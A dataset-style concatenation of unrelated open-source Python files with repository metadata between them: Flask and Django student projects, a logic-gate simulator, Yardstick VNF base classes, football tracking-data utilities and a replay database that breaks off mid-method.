sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"1599101385@qq.com"
] |
1599101385@qq.com
|
fc059d9841f05ab00deea0b42b02c3bf9c5b672a
|
f7de679c65e07a83aa39bc8e9d5aeac505b566f3
|
/08_mongo/app.py
|
ff4204bddc97ef6c163adaf3a09e7e72146487b4
|
[] |
no_license
|
DenChen11214/softdev7
|
2fed8cff212b2e47f5f2d0c860a3827b7b023526
|
40f73f5251f32a019b9d05cfdf8a70adac10689a
|
refs/heads/master
| 2020-04-19T12:51:06.292044
| 2019-05-02T17:12:26
| 2019-05-02T17:12:26
| 168,202,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,721
|
py
|
#TangoTangoMangoMongo:Dennis Chen, Robin Han, Imad Belkebeer
#SoftDev pd7
#K#08: Ay Mon, Go Git It From Yer Flask
#3/6/19
from flask import Flask, redirect, url_for, render_template, session, request
import pymongo
import os
import json
import mongo
app = Flask(__name__)
app.secret_key = os.urandom(32)
collection = None
@app.route('/')
def home():
return render_template('main.html')
@app.route('/display', methods = ["GET","POST"])
def display():
SERVER_ADDR = request.form['serverid']
global collection
connection = mongo.connect(SERVER_ADDR)
collection = mongo.importDB(SERVER_ADDR)
return render_template("newpage.html")
@app.route('/getSenP', methods = ["POST"])
def senParty():
party = request.form['party']
print(collection)
people = mongo.get_senators_from_party(party)
return render_template("newpage.html",info = people)
@app.route('/getSenI', methods = ["POST"])
def senInfo():
name = request.form["name"]
info = mongo.get_senator_info(name)
return render_template("newpage.html",info = info)
@app.route('/getConI', methods = ["POST"])
def senContact():
name = request.form["name"]
contact = mongo.get_contact_info(name)
return render_template("newpage.html",info = contact)
@app.route('/getSMI', methods = ["POST"])
def senSocial():
name = request.form["name"]
info = mongo.get_social_media_info(name)
return render_template("newpage.html",info = info)
@app.route('/getSenS', methods = ["POST"])
def senState():
state = request.form["State"]
senators = mongo.get_senators_from_state(state)
return render_template("newpage.html",info = senators)
if __name__ == "__main__":
app.debug = True
app.run()
|
[
"dchen22@stuy.edu"
] |
dchen22@stuy.edu
|
e79dd2ca53fdbbfde74fe854d3bbab50baefb268
|
850fa06b63bf259d54adecc30644371691505484
|
/app/migrations/0001_initial.py
|
15fd27323995daa7edea7d9caa30d1dd3a3be3fb
|
[] |
no_license
|
pkfkzk/djangopython
|
534f165d1e9601cafd4914f3e809d7dcbe2550cb
|
91ac58cb1f60527cbd3e166bf7bdf1c5d2f165c0
|
refs/heads/master
| 2022-05-01T05:37:14.898214
| 2019-06-25T21:26:18
| 2019-06-25T21:26:18
| 193,785,164
| 0
| 0
| null | 2022-04-22T21:43:57
| 2019-06-25T21:22:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,629
|
py
|
# Generated by Django 2.2.2 on 2019-06-25 14:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=45)),
('username', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Trip',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('destination', models.CharField(max_length=45)),
('description', models.CharField(max_length=255)),
('travelDateFrom', models.DateTimeField()),
('travelDateTo', models.DateTimeField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('jointrip', models.ManyToManyField(related_name='triptogether', to='app.User')),
('planned_By', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='trips', to='app.User')),
],
),
]
|
[
"pkfkzk@gmail.com"
] |
pkfkzk@gmail.com
|
2bc572186c70d43c31af48afcccdbafa462dd928
|
334a7ef4d295033bacdcf5573a9ff50d94bb7353
|
/basic-form-validation/server.py
|
4d86f8e401c4de96bb8e49e463e3b1ab32148de9
|
[] |
no_license
|
cd-chicago-june-cohort/flask-fundamentals-john
|
75a5b6350bf2d8ad96bf0feb8950246df17b7755
|
5c778b2a6b816bd15ef5ce375becb91519475024
|
refs/heads/master
| 2020-12-02T17:58:27.170244
| 2017-07-10T02:24:12
| 2017-07-10T02:24:12
| 96,456,342
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
from flask import Flask, render_template, redirect, request, session, flash
app = Flask(__name__)
app.secret_key = 'KeepItSecretKeepItSafe'
@app.route('/')
def index():
return render_template('index.html')
@app.route('/process', methods=['POST'])
def process():
if len(request.form["name"]) < 1:
flash("Name cannot be empty!")
else:
flash("Success! Your name is {}.".format(request.form["name"]))
return redirect('/')
app.run(debug=True)
|
[
"jpdoherty90@gmail.com"
] |
jpdoherty90@gmail.com
|
0166ddeeaf5e9d31d55bb080992bc0f5ec7e43ce
|
d219e3c9b4d72cf1fd6f0c61ca36093af0e9ad12
|
/attic/disimpy_libs.py
|
e7b89c5802190a365a97d582cc3d54211ecf8cc2
|
[] |
no_license
|
wovo/disimpy
|
747e2961c4b7b465c2d6fccd3b39f5ecaaee9f89
|
2134730a50fd838f8b29eb49031b58dd126081fd
|
refs/heads/master
| 2020-12-14T22:25:18.811424
| 2020-01-30T15:20:24
| 2020-01-30T15:20:24
| 234,891,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,347
|
py
|
"""disimpy: digital circuit simulator in Python
"""
import disimpy_base as base
import disimpy_gates as basic_gates
class nand( base.toolkit ):
"""a toolkit with only (unlimited number of inputs) nand gates
"""
def __init__( self, name = "toolkit nand" ):
super().__init__( name )
def f_nand( self, *inputs ):
self.add( "gate" )
self.add( "nand" )
self.add( "input", len( inputs ) )
return basic_gates.g_nand( inputs )
class nand2( base.toolkit ):
"""a toolkit with only 2-input nand gates
"""
def __init__( self, name = "toolkit nand2" ):
super().__init__( name )
def f_nand( self, a, b ):
self.add( "gate" )
self.add( "nand2" )
self.add( "inputs", 2 )
return basic_gates.g_nand( [ a, b ] )
class gates( base.toolkit ):
"""a toolkit with the class gates
"""
def __init__( self, name = "toolkit gates" ):
super().__init__( name )
def _make( self, name, inputs, basic ):
self.add( "gate" )
self.add( name )
self.add( "input", len( inputs ) )
return basic( inputs )
def f_not( self, *inputs ):
return self._make( "not", inputs, basic_gates.g_not )
def f_nand( self, *inputs ):
return self._make( "nand", inputs, basic_gates.g_nand )
def f_and( self, *inputs ):
return self._make( "and", inputs, basic_gates.g_and )
def f_nor( self, *inputs ):
return self._make( "nor", inputs, basic_gates.g_nor )
    def f_or( self, *inputs ):
        return self._make( "or", inputs, basic_gates.g_or )
def f_xnor( self, *inputs ):
return self._make( "xnor", inputs, basic_gates.g_xnor )
def f_xor( self, *inputs ):
return self._make( "xor", inputs, basic_gates.g_xor )
class gates_from( base.toolkit ):
    """a toolkit that adds a nand gate on top of an existing base toolkit,
    delegating everything else to that base
    """
def __init__( self, base = None, name = "" ):
self.base = base
if name == "":
name = "add gates to %s " % base.name
super().__init__( name )
def f_nand( self, *inputs ):
self.add( "gate" )
self.add( "nand" )
self.add( "input", len( inputs ) )
return basic_gates.g_nand( inputs )
def __getattr__( self, item ):
return getattr( self.base, item )
|
[
"wouter@voti.nl"
] |
wouter@voti.nl
|
05fae65f1269c0c0152dae6c1cad650454a36a28
|
11eb58ac440c8e3cd437002632c1dd488220a81f
|
/newproject/urls.py
|
2866541b4681d7898c7446f30233b7401d609a3d
|
[] |
no_license
|
rbartosinski/djangogirls_test
|
39a6f06be767ea106e11bef515ab954eb23bd06a
|
36439d6c67903cdfe6c986194cb5de22f2d4bc2b
|
refs/heads/master
| 2020-04-16T14:39:31.927699
| 2019-01-20T18:29:49
| 2019-01-20T18:29:49
| 165,675,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 797
|
py
|
"""newproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
]
|
[
"rbartosinski@wp.pl"
] |
rbartosinski@wp.pl
|
33dc1b6019a3d71fc08f47f08016af65d512aae8
|
63aef4f6b9a6e5f20e2832d2ed40c6178a219426
|
/api/product/resources.py
|
fcc912656f8c91c5c78bef4ac7de8f4c7442f4fd
|
[] |
no_license
|
longdt19/vngonow-api
|
7b98efd4fa9aca15ff554c81949222fc678d0933
|
c6a1a3d2b02a3847e469910b4b2e66df619baf51
|
refs/heads/master
| 2020-04-15T06:35:19.652708
| 2019-01-07T17:15:37
| 2019-01-07T17:15:37
| 164,465,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
from api.common.base_resources import BaseResource
from .forms import *
from .business_logics import sim_bl
class SimResource(BaseResource):
GET_INPUT_SCHEMA = GetSimDetailForm()
POST_INPUT_SCHEMA = CreateSimForm()
def get(self):
params = self.parse_request_params()
return sim_bl.get_one(**params)
def post(self):
params = self.parse_request_params()
return sim_bl.create(**params)
RESOURCES = {
'/sim': {
'resource': SimResource
}
}
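# A sketch of how RESOURCES is presumably registered elsewhere (assumed; the
# real app factory is not shown in this file):
#
#     for route, conf in RESOURCES.items():
#         api.add_resource(conf['resource'], route)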
|
[
"longdt.19@gmail.com"
] |
longdt.19@gmail.com
|
60bf16f87f5ad4e17e37db5a8f55c69a8ae134a2
|
0a66006ce524377c7f2d6986910a60a11028c62d
|
/yardstick/network_services/vnf_generic/vnf/base.py
|
1d770f724e4522392b04eff71fd5fb8ac1779147
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
alexnemes/yardstick
|
6c472ec1b070e4d4f4217d4d00c96c7b8b5a7c49
|
7a89a01cdb1b3569d0b67451572edbae0f3d05aa
|
refs/heads/master
| 2021-01-20T17:12:45.010147
| 2017-06-20T09:59:31
| 2017-06-20T09:59:31
| 94,768,728
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,743
|
py
|
# Copyright (c) 2016-2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Base class implementation for generic vnf implementation """
from __future__ import absolute_import
import logging
import ipaddress
import six
from yardstick.network_services.utils import get_nsb_option
LOG = logging.getLogger(__name__)
class QueueFileWrapper(object):
""" Class providing file-like API for talking with SSH connection """
def __init__(self, q_in, q_out, prompt):
self.q_in = q_in
self.q_out = q_out
self.closed = False
self.buf = []
self.bufsize = 20
self.prompt = prompt
def read(self, size):
""" read chunk from input queue """
if self.q_in.qsize() > 0 and size:
in_data = self.q_in.get()
return in_data
def write(self, chunk):
""" write chunk to output queue """
self.buf.append(chunk)
# flush on prompt or if we exceed bufsize
size = sum(len(c) for c in self.buf)
if self.prompt in chunk or size > self.bufsize:
out = ''.join(self.buf)
self.buf = []
self.q_out.put(out)
def close(self):
""" close multiprocessing queue """
pass
def clear(self):
""" clear queue """
while self.q_out.qsize() > 0:
self.q_out.get()
class GenericVNF(object):
""" Class providing file-like API for generic VNF implementation """
def __init__(self, vnfd):
super(GenericVNF, self).__init__()
self.vnfd = vnfd # fixme: parse this into a structure
# List of statistics we can obtain from this VNF
# - ETSI MANO 6.3.1.1 monitoring_parameter
self.kpi = self._get_kpi_definition(vnfd)
# Standard dictionary containing params like thread no, buffer size etc
self.config = {}
self.runs_traffic = False
self.name = "vnf__1" # name in topology file
self.bin_path = get_nsb_option("bin_path", "")
@classmethod
def _get_kpi_definition(cls, vnfd):
""" Get list of KPIs defined in VNFD
:param vnfd:
:return: list of KPIs, e.g. ['throughput', 'latency']
"""
return vnfd['benchmark']['kpi']
@classmethod
def get_ip_version(cls, ip_addr):
""" get ip address version v6 or v4 """
try:
address = ipaddress.ip_address(six.text_type(ip_addr))
except ValueError:
            LOG.error("%s is not valid", ip_addr)
return
else:
return address.version
    def _ip_to_hex(self, ip_addr):
        # e.g. "192.168.1.1" -> "C0A80101"; non-IPv4 addresses pass through unchanged
        ip_x = ip_addr
        if self.get_ip_version(ip_addr) == 4:
            ip_to_convert = ip_addr.split(".")
            ip_octect = [int(octect) for octect in ip_to_convert]
            ip_x = "{0[0]:02X}{0[1]:02X}{0[2]:02X}{0[3]:02X}".format(ip_octect)
        return ip_x
def _get_dpdk_port_num(self, name):
for intf in self.vnfd['vdu'][0]['external-interface']:
if name == intf['name']:
return intf['virtual-interface']['dpdk_port_num']
def _append_routes(self, ip_pipeline_cfg):
if 'routing_table' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['routing_table']
where = ip_pipeline_cfg.find("arp_route_tbl")
link = ip_pipeline_cfg[:where]
route_add = ip_pipeline_cfg[where:]
tmp = route_add.find('\n')
route_add = route_add[tmp:]
cmds = "arp_route_tbl ="
for route in routing_table:
net = self._ip_to_hex(route['network'])
net_nm = self._ip_to_hex(route['netmask'])
net_gw = self._ip_to_hex(route['gateway'])
port = self._get_dpdk_port_num(route['if'])
cmd = \
" ({port0_local_ip_hex},{port0_netmask_hex},{dpdk_port},"\
"{port1_local_ip_hex})".format(port0_local_ip_hex=net,
port0_netmask_hex=net_nm,
dpdk_port=port,
port1_local_ip_hex=net_gw)
cmds += cmd
cmds += '\n'
ip_pipeline_cfg = link + cmds + route_add
return ip_pipeline_cfg
def _append_nd_routes(self, ip_pipeline_cfg):
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
where = ip_pipeline_cfg.find("nd_route_tbl")
link = ip_pipeline_cfg[:where]
route_nd = ip_pipeline_cfg[where:]
tmp = route_nd.find('\n')
route_nd = route_nd[tmp:]
cmds = "nd_route_tbl ="
for route in routing_table:
net = route['network']
net_nm = route['netmask']
net_gw = route['gateway']
port = self._get_dpdk_port_num(route['if'])
cmd = \
" ({port0_local_ip_hex},{port0_netmask_hex},{dpdk_port},"\
"{port1_local_ip_hex})".format(port0_local_ip_hex=net,
port0_netmask_hex=net_nm,
dpdk_port=port,
port1_local_ip_hex=net_gw)
cmds += cmd
cmds += '\n'
ip_pipeline_cfg = link + cmds + route_nd
return ip_pipeline_cfg
def _get_port0localip6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 1:
return_value = route['network']
LOG.info("_get_port0localip6 : %s", return_value)
return return_value
def _get_port1localip6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 2:
return_value = route['network']
LOG.info("_get_port1localip6 : %s", return_value)
return return_value
def _get_port0prefixlen6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 1:
return_value = route['netmask']
LOG.info("_get_port0prefixlen6 : %s", return_value)
return return_value
def _get_port1prefixlen6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 2:
return_value = route['netmask']
LOG.info("_get_port1prefixlen6 : %s", return_value)
return return_value
def _get_port0gateway6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 1:
return_value = route['network']
LOG.info("_get_port0gateway6 : %s", return_value)
return return_value
def _get_port1gateway6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 2:
return_value = route['network']
LOG.info("_get_port1gateway6 : %s", return_value)
return return_value
def instantiate(self, scenario_cfg, context_cfg):
""" Prepare VNF for operation and start the VNF process/VM
:param scenario_cfg:
:param context_cfg:
:return: True/False
"""
raise NotImplementedError()
def terminate(self):
""" Kill all VNF processes
:return:
"""
raise NotImplementedError()
def scale(self, flavor=""):
"""
:param flavor:
:return:
"""
raise NotImplementedError()
def collect_kpi(self):
"""This method should return a dictionary containing the
selected KPI at a given point of time.
:return: {"kpi": value, "kpi2": value}
"""
raise NotImplementedError()
class GenericTrafficGen(GenericVNF):
""" Class providing file-like API for generic traffic generator """
def __init__(self, vnfd):
super(GenericTrafficGen, self).__init__(vnfd)
self.runs_traffic = True
self.traffic_finished = False
self.name = "tgen__1" # name in topology file
def run_traffic(self, traffic_profile):
""" Generate traffic on the wire according to the given params.
Method is non-blocking, returns immediately when traffic process
is running. Mandatory.
:param traffic_profile:
:return: True/False
"""
raise NotImplementedError()
def listen_traffic(self, traffic_profile):
""" Listen to traffic with the given parameters.
Method is non-blocking, returns immediately when traffic process
is running. Optional.
:param traffic_profile:
:return: True/False
"""
pass
def verify_traffic(self, traffic_profile):
""" Verify captured traffic after it has ended. Optional.
:param traffic_profile:
:return: dict
"""
pass
def terminate(self):
""" After this method finishes, all traffic processes should stop. Mandatory.
:return: True/False
"""
raise NotImplementedError()
|
[
"deepak.s@linux.intel.com"
] |
deepak.s@linux.intel.com
|
89cced5029171d8eeac66cd9c271abdabafc816b
|
6ce6459f7992f6f884611cc20b94d55e498cb799
|
/실습 코드/파이썬을 파이썬 답게/Welcome.py
|
9ed199dee1d3821f4c700026b59d4f395f580908
|
[] |
no_license
|
Donghyun-34/Python
|
a05b3dc0feba18839bab074643da75f7bdb1f3fe
|
0a1629113fe0cddc5def574b1ec0b11c41cbd20d
|
refs/heads/main
| 2023-07-15T12:38:22.346432
| 2021-08-30T07:42:10
| 2021-08-30T07:42:10
| 393,931,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
def solution(mylist):
"""
Version C
answer = []
for i in mylist:
answer.append(len(i))
return answer
"""
# Version Python
return list(map(len, mylist))
    # map: repeatedly applies the function given as the first argument to each element of the second argument and returns the results
print(solution([[1, 3, 4, 5], [1, 2]]))
|
[
"akakak413@naver.com"
] |
akakak413@naver.com
|
9690f03824a072205a0b0ef9394926d834113ef9
|
342af5b642839c4fd9f833ec93f4b65f3af2296c
|
/pocs/test/example.py
|
1cab5c5e3c4f2a4ab8d0a6b44ee133a86aa21f5c
|
[] |
no_license
|
anwilx/POC-S
|
4cf2a1e8e7e3eef6444cc0f9ff827afc9a5d8dd6
|
eb06d3f54b1698362ad0b62f1b26d22ecafa5624
|
refs/heads/master
| 2022-04-08T16:37:26.838436
| 2020-03-12T02:48:12
| 2020-03-12T02:48:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import unittest
class MyTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print "setUpClass"
def test_example(self):
self.assertTrue(1==1)
@classmethod
def tearDownClass(cls):
print "running teardown"
def test_single():
suite = unittest.TestSuite()
suite.addTest(MyTest('test_example'))
unittest.TextTestRunner(verbosity=2).run(suite)
if __name__ == "__main__":
unittest.main()
|
[
"2461805286@qq.com"
] |
2461805286@qq.com
|
b7598b85a18e5062a036788b0b02b5f3f71c8645
|
270d27a79aeace2e5e0d8b33e79b533679558b5f
|
/storage/objects/nucleus.py
|
01d46be2c55c33c24ad5dc2d44d9b99dd1ada304
|
[] |
no_license
|
baemms/NucleoSegment
|
dedc1237d9dccb449292de3e32c723b64da4b857
|
e644b3a3dc284cd430c25ea48e9af664c86034cf
|
refs/heads/master
| 2020-06-20T19:39:55.024310
| 2017-08-01T13:55:17
| 2017-08-01T13:55:17
| 74,744,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 156
|
py
|
"""
Store all information regarding individually merged nuclei
"""
class Nucleus:
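    # Class-level defaults; callers presumably assign per-nucleus values to
    # these fields after construction.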
volume = None
planes = None
coords = None
areas = None
|
[
"dominik@schienstock.de"
] |
dominik@schienstock.de
|
785aff74b90e752d87ebe0e8f429ca461407deb0
|
bcdcf2e9e014568c8cb7180f43be2d409218dda5
|
/src/pitchly/utils.py
|
64299bd401005bd94bf2ea57b52ecc00c5c4724c
|
[
"MIT"
] |
permissive
|
opunsoars/pitchly
|
822d2763a4c528c0806fe7d84ee3b2f50433ea3d
|
ad3bba4ab7ce1f2dc5cb6d184aac14a487d20056
|
refs/heads/master
| 2023-07-07T10:54:30.861043
| 2021-08-11T17:00:09
| 2021-08-11T17:00:09
| 358,345,099
| 10
| 2
|
MIT
| 2021-08-11T13:45:40
| 2021-04-15T17:46:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,659
|
py
|
import glob
import numpy as np
import pandas as pd
import scipy.signal as signal
from .params import prm
match_dir = "/media/opunsoars/My Book/playground/friends_of_tracking/friends_of_tracking/\
datahub/metrica_sports/sample-data/data/Sample_Game_1"
def modify_cols(tracking_df):
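    """Reshape the raw Metrica tracking CSV (whose first three rows hold team,
    player and header labels) into a frame with '<Team>_<Player>_X/Y' columns
    plus 'ball_X'/'ball_Y', numeric dtypes, a human-readable 'mins' clock and
    'Frame' as the index."""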
cols = list(tracking_df.iloc[2, :3])
# cols = cols[:3]
for i in range(3, tracking_df.shape[1] - 2, 2):
cols.append(f"{tracking_df.iloc[0,i]}_{tracking_df.iloc[1,i]}_X")
cols.append(f"{tracking_df.iloc[0,i]}_{tracking_df.iloc[1,i]}_Y")
cols.append("ball_X")
cols.append("ball_Y")
tracking_df.columns = cols
tracking_df = tracking_df.loc[3:, :]
for col in cols[2:]:
tracking_df[col] = tracking_df[col].astype(float)
tracking_df["Frame"] = tracking_df.Frame.astype(int)
tracking_df["Period"] = tracking_df.Period.astype(int)
tracking_df["mins"] = tracking_df["Time [s]"].apply(
lambda x: f"{x//60:0.0f}:{x%60:0.2f}"
)
tracking_df.set_index("Frame", inplace=True)
return tracking_df
def convert_to_metric_coords(data, field_dimen=prm.field_dim):
"""
Convert positions from Metrica units to meters (with origin at centre circle)
"""
x_columns = [c for c in data.columns if c.endswith("X")]
y_columns = [c for c in data.columns if c.endswith("Y")]
data[x_columns] = (data[x_columns] - 0.5) * field_dimen[0]
data[y_columns] = -1 * (data[y_columns] - 0.5) * field_dimen[1]
"""
------------ ***NOTE*** ------------
Metrica actually define the origin at the *top*-left of the field, not the bottom-left, as discussed in the YouTube video.
I've changed the line above to reflect this. It was originally:
data[y_columns] = ( data[y_columns]-0.5 ) * field_dimen[1]
------------ ********** ------------
"""
return data
def calc_player_velocities(
team,
smoothing=True,
filter_="moving average",
window=7,
polyorder=1,
maxspeed=12,
):
"""calc_player_velocities( tracking_data )
Calculate player velocities in x & y direciton, and total player speed at each timestamp of the tracking data
Parameters
-----------
team: the tracking DataFrame for home or away team
smoothing: boolean variable that determines whether velocity measures are smoothed. Default is True.
filter: type of filter to use when smoothing the velocities. Default is Savitzky-Golay,\
which fits a polynomial of order 'polyorder' to the data within each window
window: smoothing window size in # of frames
polyorder: order of the polynomial for the Savitzky-Golay filter. \
Default is 1 - a linear fit to the velcoity, so gradient is the acceleration
maxspeed: the maximum speed that a player can realisitically achieve (in meters/second). \
d measures that exceed maxspeed are tagged as outliers and set to NaN.
Returrns
-----------
team : the tracking DataFrame with columns for speed in the x & y direction and total speed added
"""
# remove any velocity data already in the dataframe
team = remove_player_velocities(team)
# print (team.isna().sum())
# Get the player ids
player_ids = np.unique(
[c[:-2] for c in team.columns if c[:4] in ["Home", "Away"]]
)
# Calculate the timestep from one frame to the next. Should always be 0.04 within the same half
dt = team["Time [s]"].diff()
# index of first frame in second half
second_half_idx = team.Period.idxmax(2)
# estimate velocities for players in team
for player in player_ids: # cycle through players individually
        # difference player positions in timestep dt to get an unsmoothed estimate of velocity
vx = team[player + "_X"].diff() / dt
vy = team[player + "_Y"].diff() / dt
if maxspeed > 0:
# remove unsmoothed data points that exceed the maximum speed (these are most likely position errors)
raw_speed = np.sqrt(vx ** 2 + vy ** 2)
vx[raw_speed > maxspeed] = np.nan
vy[raw_speed > maxspeed] = np.nan
if smoothing:
if filter_ == "Savitzky-Golay":
# calculate first half velocity
vx.iloc[:second_half_idx] = signal.savgol_filter(
vx.iloc[:second_half_idx],
window_length=window,
polyorder=polyorder,
)
vy.iloc[:second_half_idx] = signal.savgol_filter(
vy.iloc[:second_half_idx],
window_length=window,
polyorder=polyorder,
)
# calculate second half velocity
vx.iloc[second_half_idx:] = signal.savgol_filter(
vx.iloc[second_half_idx:],
window_length=window,
polyorder=polyorder,
)
vy.iloc[second_half_idx:] = signal.savgol_filter(
vy.iloc[second_half_idx:],
window_length=window,
polyorder=polyorder,
)
elif filter_ == "moving average":
ma_window = np.ones(window) / window
# calculate first half velocity
vx.iloc[:second_half_idx] = np.convolve(
vx.iloc[:second_half_idx], ma_window, mode="same"
)
vy.iloc[:second_half_idx] = np.convolve(
vy.iloc[:second_half_idx], ma_window, mode="same"
)
# calculate second half velocity
vx.iloc[second_half_idx:] = np.convolve(
vx.iloc[second_half_idx:], ma_window, mode="same"
)
vy.iloc[second_half_idx:] = np.convolve(
vy.iloc[second_half_idx:], ma_window, mode="same"
)
# put player speed in x,y direction, and total speed back in the data frame
team[player + "_vx"] = vx
team[player + "_vy"] = vy
team[player + "_speed"] = np.sqrt(vx ** 2 + vy ** 2)
return team
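# Minimal usage sketch (hedged -- assumes a tracking DataFrame prepared by the functions
# above; the player id "Home_10" is hypothetical):
# tracking_home = calc_player_velocities(tracking_home, smoothing=True,
#                                        filter_="Savitzky-Golay", window=7)
# tracking_home["Home_10_speed"].max()  # that player's peak speed, in m/s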
def remove_player_velocities(team):
    # remove player velocity and acceleration measures that are already in the 'team' dataframe
columns = [
c
for c in team.columns
if c.split("_")[-1] in ["vx", "vy", "ax", "ay", "speed", "acceleration"]
    ]  # velocity/acceleration columns to drop
team = team.drop(columns=columns)
return team
def flip_second_half_direction(team):
"""
Flip coordinates in second half so that each team always shoots in the same direction through the match.
"""
    second_half_idx = team.Period.idxmax()
columns = [c for c in team.columns if c[-1].lower() in ["x", "y"]]
team.loc[second_half_idx:, columns] *= -1
return team
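# Hedged note on the flip above: every column whose name ends in x/y (positions as well
# as the vx/vy velocity columns, once present) is negated from the first frame of the
# second half onwards, so each team appears to attack the same goal all match.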
def load_data(match_dir):
home_track = (
pd.read_csv(glob.glob(f"{match_dir}/*Home*.csv")[0], header=None)
.pipe(modify_cols)
.pipe(convert_to_metric_coords)
.pipe(calc_player_velocities)
.pipe(flip_second_half_direction)
)
away_track = (
pd.read_csv(glob.glob(f"{match_dir}/*Away*.csv")[0], header=None)
.pipe(modify_cols)
.pipe(convert_to_metric_coords)
.pipe(calc_player_velocities)
.pipe(flip_second_half_direction)
)
events = (
pd.read_csv(glob.glob(f"{match_dir}/*Events*.csv")[0])
.pipe(convert_to_metric_coords)
.pipe(flip_second_half_direction)
)
return home_track, away_track, events
# tracking_home, tracking_away, events = load_data(match_dir)
|
[
"vinay.warrier@gmail.com"
] |
vinay.warrier@gmail.com
|
519f704a27b31e3a77185effc036ed4eedd92cdd
|
73fb3e773d5f884197882a94036bb1b52f232029
|
/legacy/replay_db.py
|
b5ff023ca178484c834c82f57be4850fbe081a14
|
[] |
no_license
|
Steve132/bard
|
32bc7fe02876b8a9824d12de4b24a6f488e44c7a
|
410e4a9653b15e8390f581f2540be6823bd96417
|
refs/heads/master
| 2020-05-30T22:43:47.974876
| 2019-11-21T01:27:45
| 2019-11-21T01:27:45
| 21,441,196
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,631
|
py
|
import sys
import base64
import json
import urllib
from collections import MutableMapping
class ReplayDB(MutableMapping):
def _decode(self,c):
s=urllib.unquote(c)
#s=base64.standard_b64decode(s)
return json.loads(s)
def _encode(self,o):
s=json.dumps(o)
c=urllib.quote(s)
#c=base64.standard_b64encode(s)
return c
def _writeset(self,key,value):
self.replayfileobj.write("s %s %s\n" % (self._encode(key),self._encode(value)))
def _writedel(self,key):
self.replayfileobj.write("d %s NONE\n" % (self._encode(key)))
def __init__(self,replayfile):
self.rdb={}
try:
with open(replayfile,'r') as trpfob:
for entry in trpfob:
try:
op,ke,ve=entry.split()
k=self._decode(ke)
v=self._decode(ve)
k=tuple(k)
if(op=='d'):
del self.rdb[k]
elif(op=='s'):
self.rdb[k]=v
except Exception as e1:
                        print("error unpacking in %s:%r. (%r)" % (replayfile,e1,entry))  # report the raw line: ke/ve may be unbound if split() failed
except Exception as e:
print("couldn't open %s:%r" % (replayfile,e))
self.replayfileobj=open(replayfile,'w+')
for k,v in self.rdb.items():
#print("WRITEBACK "+str(k)+':'+str(v))
self._writeset(k,v)
def __getitem__(self,key):
return self.rdb[key]
def __setitem__(self,key,value):
ov=self.rdb.get(key,None)
